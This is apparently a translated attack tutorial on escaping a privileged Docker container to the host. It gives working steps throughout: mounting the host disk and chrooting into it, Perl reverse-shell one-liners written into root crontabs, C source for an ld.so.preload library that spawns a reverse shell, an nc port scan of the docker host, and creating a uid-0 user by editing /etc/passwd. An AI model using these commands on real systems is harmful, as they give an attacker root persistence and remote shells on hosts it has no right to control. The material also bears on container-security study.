Article Directory
Improper configuration of CAP permissions
privileged, privileged container privilege escalation
Test environment configuration
docker run -it --privileged ubuntu:18.04
Actual environment use
If you see that CapEff is 0000003fffffffff, it means that it is a privileged container and can escape
cat /proc/1/status|grep CapEff
CapEff: 0000003fffffffff
Escape method, mount the host root directory
fdisk -l|grep Linux
mkdir /host
mount /dev/vda1 /host
chroot /host
At this time, it is only the escape at the file system level, and it has not escaped completely. The next method needs to be used
Scheduled Tasks
/var/spool/cron/crontabs/ for ubuntu debain
ls -la /var/spool/cron/crontabs
If the directory exists, it means we can write a crontab
echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/crontabs/root
chmod 600 /var/spool/cron/crontabs/root
Then just run away
/var/spool/cron for centos
ls -la /var/spool/cron/
If the directory exists, it means we can write a crontab
echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/root
chmod 600 /var/spool/cron/root
ld.so.preload
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
int tcp_port = 8080;
char *ip = "127.0.0.1";
__attribute__((destructor)) void test(){
remove("/etc/ld.so.preload");
int pid;
if((pid=fork())==0){
int fd;
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(tcp_port);
addr.sin_addr.s_addr = inet_addr(ip);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
system("/bin/bash");
}
}
gcc evil.c --shared -fPIC -o evil.so
Upload evil.so to /tmp
echo '/tmp/evil.so' >/etc/ld.so.preload
Then the next time the system will automatically load this so, and can achieve non-perceptual injection to achieve escape, but this kind of injection still needs similar operation and maintenance operations to be triggered, or a new process is created
ssh
When the file system escapes to the host, port scanning can be done
nc -nvz -w2 172.17.0.1 1-65535 2>&1|grep succeeded
If it is found that the host host has opened the ssh service, then we can directly ssh log in to the host host to escape
directly adduser
adduser test
passwd test
At the same time, you can modify /etc/passwd to change the test uid to 0 and become root